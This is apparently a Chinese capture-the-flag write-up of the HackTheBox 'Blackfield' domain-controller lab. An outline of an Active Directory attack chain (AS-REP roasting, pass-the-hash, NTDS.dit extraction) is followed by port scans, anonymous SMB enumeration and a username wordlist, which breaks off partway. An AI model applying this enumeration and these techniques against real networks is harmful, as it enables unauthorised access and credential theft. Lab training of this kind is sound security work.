HackTheBox-Blackfield

Look at the stars
抬头仰望满天繁星
Look how they shine for you
看它们为你绽放着 闪烁不息
And everything you do
而你的一颦一举
Yeah’ they were all Yellow
却满含胆怯和羞意

靶机ip:10.129.229.17

难度:困难

涉及内容:

信息收集与枚举:

  • 端口扫描与服务识别 (RustScan / Nmap)
  • SMB 空会话枚举与共享目录探测
  • RPC 匿名访问查找域 SID (impacket-lookupsid)
  • Kerberos 用户名暴力枚举 (kerbrute)

初始凭证获取:

  • AS-REP Roasting 攻击获取无预认证用户的 TGT (impacket-GetNPUsers)
  • 离线密码哈希破解 (john /字典攻击)

域内权限滥用与横向移动:

  • AD 访问控制列表 (ACL) 枚举与可视化分析 (RustHound / BloodHound)
  • 滥用 ForceChangePassword 权限强制重置目标用户密码 (rpcclient)

敏感信息提取:

  • SMB 离线取证文件下载与 LSASS 内存转储分析 (pypykatz)
  • 哈希传递攻击 (Pass-the-Hash, PtH) 获取 WinRM 会话

域控权限提升 (最终决战):

  • 令牌特权审计 (枚举 SeBackupPrivilegeSeRestorePrivilege 权限)
  • 滥用 VSS (卷影拷贝服务) 绕过文件读写锁 (DiskShadow 脚本编写与挂载)
  • 利用高权限无视文件系统 ACL 提取 AD 核心数据库 (robocopy /b 提取 NTDS.dit 与 SYSTEM 注册表配置单元)
  • 本地离线解析 NTDS.dit 提取全域用户哈希 (impacket-secretsdump)

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 10.129.229.17
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.129.229.17:53
Open 10.129.229.17:88
Open 10.129.229.17:135
Open 10.129.229.17:389
Open 10.129.229.17:445
Open 10.129.229.17:593
Open 10.129.229.17:3268
Open 10.129.229.17:5985
[~] Starting Script(s)
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-22 01:33 +0000
Initiating Ping Scan at 01:33
Scanning 10.129.229.17 [4 ports]
Completed Ping Scan at 01:33, 0.19s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:33
Completed Parallel DNS resolution of 1 host. at 01:33, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:33
Scanning 10.129.229.17 [8 ports]
Discovered open port 53/tcp on 10.129.229.17
Discovered open port 445/tcp on 10.129.229.17
Discovered open port 135/tcp on 10.129.229.17
Discovered open port 593/tcp on 10.129.229.17
Discovered open port 3268/tcp on 10.129.229.17
Discovered open port 88/tcp on 10.129.229.17
Discovered open port 5985/tcp on 10.129.229.17
Discovered open port 389/tcp on 10.129.229.17
Completed SYN Stealth Scan at 01:33, 0.25s elapsed (8 total ports)
Nmap scan report for 10.129.229.17
Host is up, received echo-reply ttl 127 (0.21s latency).
Scanned at 2026-06-22 01:33:03 UTC for 1s

PORT     STATE SERVICE        REASON
53/tcp   open  domain         syn-ack ttl 127
88/tcp   open  kerberos-sec   syn-ack ttl 127
135/tcp  open  msrpc          syn-ack ttl 127
389/tcp  open  ldap           syn-ack ttl 127
445/tcp  open  microsoft-ds   syn-ack ttl 127
593/tcp  open  http-rpc-epmap syn-ack ttl 127
3268/tcp open  globalcatLDAP  syn-ack ttl 127
5985/tcp open  wsman          syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.02 seconds
           Raw packets sent: 12 (504B) | Rcvd: 9 (380B)


查看smb服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -L //10.129.229.17              
Password for [WORKGROUP\root]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	forensic        Disk      Forensic / Audit share.
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	profiles$       Disk      
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.229.17 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -N //10.129.229.17/profiles$
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jun  3 16:47:12 2020
  ..                                  D        0  Wed Jun  3 16:47:12 2020
  AAlleni                             D        0  Wed Jun  3 16:47:11 2020
  ABarteski                           D        0  Wed Jun  3 16:47:11 2020
  ABekesz                             D        0  Wed Jun  3 16:47:11 2020
  ABenzies                            D        0  Wed Jun  3 16:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 16:47:11 2020
  AChampken                           D        0  Wed Jun  3 16:47:11 2020
  ACheretei                           D        0  Wed Jun  3 16:47:11 2020
  ACsonaki                            D        0  Wed Jun  3 16:47:11 2020
  AHigchens                           D        0  Wed Jun  3 16:47:11 2020
  AJaquemai                           D        0  Wed Jun  3 16:47:11 2020
  AKlado                              D        0  Wed Jun  3 16:47:11 2020
  AKoffenburger                       D        0  Wed Jun  3 16:47:11 2020
  AKollolli                           D        0  Wed Jun  3 16:47:11 2020
  AKruppe                             D        0  Wed Jun  3 16:47:11 2020
  AKubale                             D        0  Wed Jun  3 16:47:11 2020
  ALamerz                             D        0  Wed Jun  3 16:47:11 2020
  AMaceldon                           D        0  Wed Jun  3 16:47:11 2020
  AMasalunga                          D        0  Wed Jun  3 16:47:11 2020
  ANavay                              D        0  Wed Jun  3 16:47:11 2020
  ANesterova                          D        0  Wed Jun  3 16:47:11 2020
  ANeusse                             D        0  Wed Jun  3 16:47:11 2020
  AOkleshen                           D        0  Wed Jun  3 16:47:11 2020
  APustulka                           D        0  Wed Jun  3 16:47:11 2020
  ARotella                            D        0  Wed Jun  3 16:47:11 2020
  ASanwardeker                        D        0  Wed Jun  3 16:47:11 2020
  AShadaia                            D        0  Wed Jun  3 16:47:11 2020
  ASischo                             D        0  Wed Jun  3 16:47:11 2020
  ASpruce                             D        0  Wed Jun  3 16:47:11 2020
  ATakach                             D        0  Wed Jun  3 16:47:11 2020
  ATaueg                              D        0  Wed Jun  3 16:47:11 2020
  ATwardowski                         D        0  Wed Jun  3 16:47:11 2020
  audit2020                           D        0  Wed Jun  3 16:47:11 2020
  AWangenheim                         D        0  Wed Jun  3 16:47:11 2020
  AWorsey                             D        0  Wed Jun  3 16:47:11 2020
  AZigmunt                            D        0  Wed Jun  3 16:47:11 2020
  BBakajza                            D        0  Wed Jun  3 16:47:11 2020
  BBeloucif                           D        0  Wed Jun  3 16:47:11 2020
  BCarmitcheal                        D        0  Wed Jun  3 16:47:11 2020
  BConsultant                         D        0  Wed Jun  3 16:47:11 2020
  BErdossy                            D        0  Wed Jun  3 16:47:11 2020
  BGeminski                           D        0  Wed Jun  3 16:47:11 2020
  BLostal                             D        0  Wed Jun  3 16:47:11 2020
  BMannise                            D        0  Wed Jun  3 16:47:11 2020
  BNovrotsky                          D        0  Wed Jun  3 16:47:11 2020
  BRigiero                            D        0  Wed Jun  3 16:47:11 2020
  BSamkoses                           D        0  Wed Jun  3 16:47:11 2020
  BZandonella                         D        0  Wed Jun  3 16:47:11 2020
  CAcherman                           D        0  Wed Jun  3 16:47:12 2020
  CAkbari                             D        0  Wed Jun  3 16:47:12 2020
  CAldhowaihi                         D        0  Wed Jun  3 16:47:12 2020
  CArgyropolous                       D        0  Wed Jun  3 16:47:12 2020
  CDufrasne                           D        0  Wed Jun  3 16:47:12 2020
  CGronk                              D        0  Wed Jun  3 16:47:11 2020
  Chiucarello                         D        0  Wed Jun  3 16:47:11 2020
  Chiuccariello                       D        0  Wed Jun  3 16:47:12 2020
  CHoytal                             D        0  Wed Jun  3 16:47:12 2020
  CKijauskas                          D        0  Wed Jun  3 16:47:12 2020
  CKolbo                              D        0  Wed Jun  3 16:47:12 2020
  CMakutenas                          D        0  Wed Jun  3 16:47:12 2020
  CMorcillo                           D        0  Wed Jun  3 16:47:11 2020
  CSchandall                          D        0  Wed Jun  3 16:47:12 2020
  CSelters                            D        0  Wed Jun  3 16:47:12 2020
  CTolmie                             D        0  Wed Jun  3 16:47:12 2020
  DCecere                             D        0  Wed Jun  3 16:47:12 2020
  DChintalapalli                      D        0  Wed Jun  3 16:47:12 2020
  DCwilich                            D        0  Wed Jun  3 16:47:12 2020
  DGarbatiuc                          D        0  Wed Jun  3 16:47:12 2020
  DKemesies                           D        0  Wed Jun  3 16:47:12 2020
  DMatuka                             D        0  Wed Jun  3 16:47:12 2020
  DMedeme                             D        0  Wed Jun  3 16:47:12 2020
  DMeherek                            D        0  Wed Jun  3 16:47:12 2020
  DMetych                             D        0  Wed Jun  3 16:47:12 2020
  DPaskalev                           D        0  Wed Jun  3 16:47:12 2020
  DPriporov                           D        0  Wed Jun  3 16:47:12 2020
  DRusanovskaya                       D        0  Wed Jun  3 16:47:12 2020
  DVellela                            D        0  Wed Jun  3 16:47:12 2020
  DVogleson                           D        0  Wed Jun  3 16:47:12 2020
  DZwinak                             D        0  Wed Jun  3 16:47:12 2020
  EBoley                              D        0  Wed Jun  3 16:47:12 2020
  EEulau                              D        0  Wed Jun  3 16:47:12 2020
  EFeatherling                        D        0  Wed Jun  3 16:47:12 2020
  EFrixione                           D        0  Wed Jun  3 16:47:12 2020
  EJenorik                            D        0  Wed Jun  3 16:47:12 2020
  EKmilanovic                         D        0  Wed Jun  3 16:47:12 2020
  ElKatkowsky                         D        0  Wed Jun  3 16:47:12 2020
  EmaCaratenuto                       D        0  Wed Jun  3 16:47:12 2020
  EPalislamovic                       D        0  Wed Jun  3 16:47:12 2020
  EPryar                              D        0  Wed Jun  3 16:47:12 2020
  ESachhitello                        D        0  Wed Jun  3 16:47:12 2020
  ESariotti                           D        0  Wed Jun  3 16:47:12 2020
  ETurgano                            D        0  Wed Jun  3 16:47:12 2020
  EWojtila                            D        0  Wed Jun  3 16:47:12 2020
  FAlirezai                           D        0  Wed Jun  3 16:47:12 2020
  FBaldwind                           D        0  Wed Jun  3 16:47:12 2020
  FBroj                               D        0  Wed Jun  3 16:47:12 2020
  FDeblaquire                         D        0  Wed Jun  3 16:47:12 2020
  FDegeorgio                          D        0  Wed Jun  3 16:47:12 2020
  FianLaginja                         D        0  Wed Jun  3 16:47:12 2020
  FLasokowski                         D        0  Wed Jun  3 16:47:12 2020
  FPflum                              D        0  Wed Jun  3 16:47:12 2020
  FReffey                             D        0  Wed Jun  3 16:47:12 2020
  GaBelithe                           D        0  Wed Jun  3 16:47:12 2020
  Gareld                              D        0  Wed Jun  3 16:47:12 2020
  GBatowski                           D        0  Wed Jun  3 16:47:12 2020
  GForshalger                         D        0  Wed Jun  3 16:47:12 2020
  GGomane                             D        0  Wed Jun  3 16:47:12 2020
  GHisek                              D        0  Wed Jun  3 16:47:12 2020
  GMaroufkhani                        D        0  Wed Jun  3 16:47:12 2020
  GMerewether                         D        0  Wed Jun  3 16:47:12 2020
  GQuinniey                           D        0  Wed Jun  3 16:47:12 2020
  GRoswurm                            D        0  Wed Jun  3 16:47:12 2020
  GWiegard                            D        0  Wed Jun  3 16:47:12 2020
  HBlaziewske                         D        0  Wed Jun  3 16:47:12 2020
  HColantino                          D        0  Wed Jun  3 16:47:12 2020
  HConforto                           D        0  Wed Jun  3 16:47:12 2020
  HCunnally                           D        0  Wed Jun  3 16:47:12 2020
  HGougen                             D        0  Wed Jun  3 16:47:12 2020
  HKostova                            D        0  Wed Jun  3 16:47:12 2020
  IChristijr                          D        0  Wed Jun  3 16:47:12 2020
  IKoledo                             D        0  Wed Jun  3 16:47:12 2020
  IKotecky                            D        0  Wed Jun  3 16:47:12 2020
  ISantosi                            D        0  Wed Jun  3 16:47:12 2020
  JAngvall                            D        0  Wed Jun  3 16:47:12 2020
  JBehmoiras                          D        0  Wed Jun  3 16:47:12 2020
  JDanten                             D        0  Wed Jun  3 16:47:12 2020
  JDjouka                             D        0  Wed Jun  3 16:47:12 2020
  JKondziola                          D        0  Wed Jun  3 16:47:12 2020
  JLeytushsenior                      D        0  Wed Jun  3 16:47:12 2020
  JLuthner                            D        0  Wed Jun  3 16:47:12 2020
  JMoorehendrickson                   D        0  Wed Jun  3 16:47:12 2020
  JPistachio                          D        0  Wed Jun  3 16:47:12 2020
  JScima                              D        0  Wed Jun  3 16:47:12 2020
  JSebaali                            D        0  Wed Jun  3 16:47:12 2020
  JShoenherr                          D        0  Wed Jun  3 16:47:12 2020
  JShuselvt                           D        0  Wed Jun  3 16:47:12 2020
  KAmavisca                           D        0  Wed Jun  3 16:47:12 2020
  KAtolikian                          D        0  Wed Jun  3 16:47:12 2020
  KBrokinn                            D        0  Wed Jun  3 16:47:12 2020
  KCockeril                           D        0  Wed Jun  3 16:47:12 2020
  KColtart                            D        0  Wed Jun  3 16:47:12 2020
  KCyster                             D        0  Wed Jun  3 16:47:12 2020
  KDorney                             D        0  Wed Jun  3 16:47:12 2020
  KKoesno                             D        0  Wed Jun  3 16:47:12 2020
  KLangfur                            D        0  Wed Jun  3 16:47:12 2020
  KMahalik                            D        0  Wed Jun  3 16:47:12 2020
  KMasloch                            D        0  Wed Jun  3 16:47:12 2020
  KMibach                             D        0  Wed Jun  3 16:47:12 2020
  KParvankova                         D        0  Wed Jun  3 16:47:12 2020
  KPregnolato                         D        0  Wed Jun  3 16:47:12 2020
  KRasmor                             D        0  Wed Jun  3 16:47:12 2020
  KShievitz                           D        0  Wed Jun  3 16:47:12 2020
  KSojdelius                          D        0  Wed Jun  3 16:47:12 2020
  KTambourgi                          D        0  Wed Jun  3 16:47:12 2020
  KVlahopoulos                        D        0  Wed Jun  3 16:47:12 2020
  KZyballa                            D        0  Wed Jun  3 16:47:12 2020
  LBajewsky                           D        0  Wed Jun  3 16:47:12 2020
  LBaligand                           D        0  Wed Jun  3 16:47:12 2020
  LBarhamand                          D        0  Wed Jun  3 16:47:12 2020
  LBirer                              D        0  Wed Jun  3 16:47:12 2020
  LBobelis                            D        0  Wed Jun  3 16:47:12 2020
  LChippel                            D        0  Wed Jun  3 16:47:12 2020
  LChoffin                            D        0  Wed Jun  3 16:47:12 2020
  LCominelli                          D        0  Wed Jun  3 16:47:12 2020
  LDruge                              D        0  Wed Jun  3 16:47:12 2020
  LEzepek                             D        0  Wed Jun  3 16:47:12 2020
  LHyungkim                           D        0  Wed Jun  3 16:47:12 2020
  LKarabag                            D        0  Wed Jun  3 16:47:12 2020
  LKirousis                           D        0  Wed Jun  3 16:47:12 2020
  LKnade                              D        0  Wed Jun  3 16:47:12 2020
  LKrioua                             D        0  Wed Jun  3 16:47:12 2020
  LLefebvre                           D        0  Wed Jun  3 16:47:12 2020
  LLoeradeavilez                      D        0  Wed Jun  3 16:47:12 2020
  LMichoud                            D        0  Wed Jun  3 16:47:12 2020
  LTindall                            D        0  Wed Jun  3 16:47:12 2020
  LYturbe                             D        0  Wed Jun  3 16:47:12 2020
  MArcynski                           D        0  Wed Jun  3 16:47:12 2020
  MAthilakshmi                        D        0  Wed Jun  3 16:47:12 2020
  MAttravanam                         D        0  Wed Jun  3 16:47:12 2020
  MBrambini                           D        0  Wed Jun  3 16:47:12 2020
  MHatziantoniou                      D        0  Wed Jun  3 16:47:12 2020
  MHoerauf                            D        0  Wed Jun  3 16:47:12 2020
  MKermarrec                          D        0  Wed Jun  3 16:47:12 2020
  MKillberg                           D        0  Wed Jun  3 16:47:12 2020
  MLapesh                             D        0  Wed Jun  3 16:47:12 2020
  MMakhsous                           D        0  Wed Jun  3 16:47:12 2020
  MMerezio                            D        0  Wed Jun  3 16:47:12 2020
  MNaciri                             D        0  Wed Jun  3 16:47:12 2020
  MShanmugarajah                      D        0  Wed Jun  3 16:47:12 2020
  MSichkar                            D        0  Wed Jun  3 16:47:12 2020
  MTemko                              D        0  Wed Jun  3 16:47:12 2020
  MTipirneni                          D        0  Wed Jun  3 16:47:12 2020
  MTonuri                             D        0  Wed Jun  3 16:47:12 2020
  MVanarsdel                          D        0  Wed Jun  3 16:47:12 2020
  NBellibas                           D        0  Wed Jun  3 16:47:12 2020
  NDikoka                             D        0  Wed Jun  3 16:47:12 2020
  NGenevro                            D        0  Wed Jun  3 16:47:12 2020
  NGoddanti                           D        0  Wed Jun  3 16:47:12 2020
  NMrdirk                             D        0  Wed Jun  3 16:47:12 2020
  NPulido                             D        0  Wed Jun  3 16:47:12 2020
  NRonges                             D        0  Wed Jun  3 16:47:12 2020
  NSchepkie                           D        0  Wed Jun  3 16:47:12 2020
  NVanpraet                           D        0  Wed Jun  3 16:47:12 2020
  OBelghazi                           D        0  Wed Jun  3 16:47:12 2020
  OBushey                             D        0  Wed Jun  3 16:47:12 2020
  OHardybala                          D        0  Wed Jun  3 16:47:12 2020
  OLunas                              D        0  Wed Jun  3 16:47:12 2020
  ORbabka                             D        0  Wed Jun  3 16:47:12 2020
  PBourrat                            D        0  Wed Jun  3 16:47:12 2020
  PBozzelle                           D        0  Wed Jun  3 16:47:12 2020
  PBranti                             D        0  Wed Jun  3 16:47:12 2020
  PCapperella                         D        0  Wed Jun  3 16:47:12 2020
  PCurtz                              D        0  Wed Jun  3 16:47:12 2020
  PDoreste                            D        0  Wed Jun  3 16:47:12 2020
  PGegnas                             D        0  Wed Jun  3 16:47:12 2020
  PMasulla                            D        0  Wed Jun  3 16:47:12 2020
  PMendlinger                         D        0  Wed Jun  3 16:47:12 2020
  PParakat                            D        0  Wed Jun  3 16:47:12 2020
  PProvencer                          D        0  Wed Jun  3 16:47:12 2020
  PTesik                              D        0  Wed Jun  3 16:47:12 2020
  PVinkovich                          D        0  Wed Jun  3 16:47:12 2020
  PVirding                            D        0  Wed Jun  3 16:47:12 2020
  PWeinkaus                           D        0  Wed Jun  3 16:47:12 2020
  RBaliukonis                         D        0  Wed Jun  3 16:47:12 2020
  RBochare                            D        0  Wed Jun  3 16:47:12 2020
  RKrnjaic                            D        0  Wed Jun  3 16:47:12 2020
  RNemnich                            D        0  Wed Jun  3 16:47:12 2020
  RPoretsky                           D        0  Wed Jun  3 16:47:12 2020
  RStuehringer                        D        0  Wed Jun  3 16:47:12 2020
  RSzewczuga                          D        0  Wed Jun  3 16:47:12 2020
  RVallandas                          D        0  Wed Jun  3 16:47:12 2020
  RWeatherl                           D        0  Wed Jun  3 16:47:12 2020
  RWissor                             D        0  Wed Jun  3 16:47:12 2020
  SAbdulagatov                        D        0  Wed Jun  3 16:47:12 2020
  SAjowi                              D        0  Wed Jun  3 16:47:12 2020
  SAlguwaihes                         D        0  Wed Jun  3 16:47:12 2020
  SBonaparte                          D        0  Wed Jun  3 16:47:12 2020
  SBouzane                            D        0  Wed Jun  3 16:47:12 2020
  SChatin                             D        0  Wed Jun  3 16:47:12 2020
  SDellabitta                         D        0  Wed Jun  3 16:47:12 2020
  SDhodapkar                          D        0  Wed Jun  3 16:47:12 2020
  SEulert                             D        0  Wed Jun  3 16:47:12 2020
  SFadrigalan                         D        0  Wed Jun  3 16:47:12 2020
  SGolds                              D        0  Wed Jun  3 16:47:12 2020
  SGrifasi                            D        0  Wed Jun  3 16:47:12 2020
  SGtlinas                            D        0  Wed Jun  3 16:47:12 2020
  SHauht                              D        0  Wed Jun  3 16:47:12 2020
  SHederian                           D        0  Wed Jun  3 16:47:12 2020
  SHelregel                           D        0  Wed Jun  3 16:47:12 2020
  SKrulig                             D        0  Wed Jun  3 16:47:12 2020
  SLewrie                             D        0  Wed Jun  3 16:47:12 2020
  SMaskil                             D        0  Wed Jun  3 16:47:12 2020
  Smocker                             D        0  Wed Jun  3 16:47:12 2020
  SMoyta                              D        0  Wed Jun  3 16:47:12 2020
  SRaustiala                          D        0  Wed Jun  3 16:47:12 2020
  SReppond                            D        0  Wed Jun  3 16:47:12 2020
  SSicliano                           D        0  Wed Jun  3 16:47:12 2020
  SSilex                              D        0  Wed Jun  3 16:47:12 2020
  SSolsbak                            D        0  Wed Jun  3 16:47:12 2020
  STousignaut                         D        0  Wed Jun  3 16:47:12 2020
  support                             D        0  Wed Jun  3 16:47:12 2020
  svc_backup                          D        0  Wed Jun  3 16:47:12 2020
  SWhyte                              D        0  Wed Jun  3 16:47:12 2020
  SWynigear                           D        0  Wed Jun  3 16:47:12 2020
  TAwaysheh                           D        0  Wed Jun  3 16:47:12 2020
  TBadenbach                          D        0  Wed Jun  3 16:47:12 2020
  TCaffo                              D        0  Wed Jun  3 16:47:12 2020
  TCassalom                           D        0  Wed Jun  3 16:47:12 2020
  TEiselt                             D        0  Wed Jun  3 16:47:12 2020
  TFerencdo                           D        0  Wed Jun  3 16:47:12 2020
  TGaleazza                           D        0  Wed Jun  3 16:47:12 2020
  TKauten                             D        0  Wed Jun  3 16:47:12 2020
  TKnupke                             D        0  Wed Jun  3 16:47:12 2020
  TLintlop                            D        0  Wed Jun  3 16:47:12 2020
  TMusselli                           D        0  Wed Jun  3 16:47:12 2020
  TOust                               D        0  Wed Jun  3 16:47:12 2020
  TSlupka                             D        0  Wed Jun  3 16:47:12 2020
  TStausland                          D        0  Wed Jun  3 16:47:12 2020
  TZumpella                           D        0  Wed Jun  3 16:47:12 2020
  UCrofskey                           D        0  Wed Jun  3 16:47:12 2020
  UMarylebone                         D        0  Wed Jun  3 16:47:12 2020
  UPyrke                              D        0  Wed Jun  3 16:47:12 2020
  VBublavy                            D        0  Wed Jun  3 16:47:12 2020
  VButziger                           D        0  Wed Jun  3 16:47:12 2020
  VFuscca                             D        0  Wed Jun  3 16:47:12 2020
  VLitschauer                         D        0  Wed Jun  3 16:47:12 2020
  VMamchuk                            D        0  Wed Jun  3 16:47:12 2020
  VMarija                             D        0  Wed Jun  3 16:47:12 2020
  VOlaosun                            D        0  Wed Jun  3 16:47:12 2020
  VPapalouca                          D        0  Wed Jun  3 16:47:12 2020
  WSaldat                             D        0  Wed Jun  3 16:47:12 2020
  WVerzhbytska                        D        0  Wed Jun  3 16:47:12 2020
  WZelazny                            D        0  Wed Jun  3 16:47:12 2020
  XBemelen                            D        0  Wed Jun  3 16:47:12 2020
  XDadant                             D        0  Wed Jun  3 16:47:12 2020
  XDebes                              D        0  Wed Jun  3 16:47:12 2020
  XKonegni                            D        0  Wed Jun  3 16:47:12 2020
  XRykiel                             D        0  Wed Jun  3 16:47:12 2020
  YBleasdale                          D        0  Wed Jun  3 16:47:12 2020
  YHuftalin                           D        0  Wed Jun  3 16:47:12 2020
  YKivlen                             D        0  Wed Jun  3 16:47:12 2020
  YKozlicki                           D        0  Wed Jun  3 16:47:12 2020
  YNyirenda                           D        0  Wed Jun  3 16:47:12 2020
  YPredestin                          D        0  Wed Jun  3 16:47:12 2020
  YSeturino                           D        0  Wed Jun  3 16:47:12 2020
  YSkoropada                          D        0  Wed Jun  3 16:47:12 2020
  YVonebers                           D        0  Wed Jun  3 16:47:12 2020
  YZarpentine                         D        0  Wed Jun  3 16:47:12 2020
  ZAlatti                             D        0  Wed Jun  3 16:47:12 2020
  ZKrenselewski                       D        0  Wed Jun  3 16:47:12 2020
  ZMalaab                             D        0  Wed Jun  3 16:47:12 2020
  ZMiick                              D        0  Wed Jun  3 16:47:12 2020
  ZScozzari                           D        0  Wed Jun  3 16:47:12 2020
  ZTimofeeff                          D        0  Wed Jun  3 16:47:12 2020
  ZWausik                             D        0  Wed Jun  3 16:47:12 2020

		5102079 blocks of size 4096. 1691376 blocks available

得到一堆空目录,目录名像是人名。

做成字典。

1
awk '{print $1}' users.txt > users1.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat users.txt 
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
ACsonaki
AHigchens
AJaquemai
AKlado
AKoffenburger
AKollolli
AKruppe
AKubale
ALamerz
AMaceldon
AMasalunga
ANavay
ANesterova
ANeusse
AOkleshen
APustulka
ARotella
ASanwardeker
AShadaia
ASischo
ASpruce
ATakach
ATaueg
ATwardowski
audit2020
AWangenheim
AWorsey
AZigmunt
BBakajza
BBeloucif
BCarmitcheal
BConsultant
BErdossy
BGeminski
BLostal
BMannise
BNovrotsky
BRigiero
BSamkoses
BZandonella
CAcherman
CAkbari
CAldhowaihi
CArgyropolous
CDufrasne
CGronk
Chiucarello
Chiuccariello
CHoytal
CKijauskas
CKolbo
CMakutenas
CMorcillo
CSchandall
CSelters
CTolmie
DCecere
DChintalapalli
DCwilich
DGarbatiuc
DKemesies
DMatuka
DMedeme
DMeherek
DMetych
DPaskalev
DPriporov
DRusanovskaya
DVellela
DVogleson
DZwinak
EBoley
EEulau
EFeatherling
EFrixione
EJenorik
EKmilanovic
ElKatkowsky
EmaCaratenuto
EPalislamovic
EPryar
ESachhitello
ESariotti
ETurgano
EWojtila
FAlirezai
FBaldwind
FBroj
FDeblaquire
FDegeorgio
FianLaginja
FLasokowski
FPflum
FReffey
GaBelithe
Gareld
GBatowski
GForshalger
GGomane
GHisek
GMaroufkhani
GMerewether
GQuinniey
GRoswurm
GWiegard
HBlaziewske
HColantino
HConforto
HCunnally
HGougen
HKostova
IChristijr
IKoledo
IKotecky
ISantosi
JAngvall
JBehmoiras
JDanten
JDjouka
JKondziola
JLeytushsenior
JLuthner
JMoorehendrickson
JPistachio
JScima
JSebaali
JShoenherr
JShuselvt
KAmavisca
KAtolikian
KBrokinn
KCockeril
KColtart
KCyster
KDorney
KKoesno
KLangfur
KMahalik
KMasloch
KMibach
KParvankova
KPregnolato
KRasmor
KShievitz
KSojdelius
KTambourgi
KVlahopoulos
KZyballa
LBajewsky
LBaligand
LBarhamand
LBirer
LBobelis
LChippel
LChoffin
LCominelli
LDruge
LEzepek
LHyungkim
LKarabag
LKirousis
LKnade
LKrioua
LLefebvre
LLoeradeavilez
LMichoud
LTindall
LYturbe
MArcynski
MAthilakshmi
MAttravanam
MBrambini
MHatziantoniou
MHoerauf
MKermarrec
MKillberg
MLapesh
MMakhsous
MMerezio
MNaciri
MShanmugarajah
MSichkar
MTemko
MTipirneni
MTonuri
MVanarsdel
NBellibas
NDikoka
NGenevro
NGoddanti
NMrdirk
NPulido
NRonges
NSchepkie
NVanpraet
OBelghazi
OBushey
OHardybala
OLunas
ORbabka
PBourrat
PBozzelle
PBranti
PCapperella
PCurtz
PDoreste
PGegnas
PMasulla
PMendlinger
PParakat
PProvencer
PTesik
PVinkovich
PVirding
PWeinkaus
RBaliukonis
RBochare
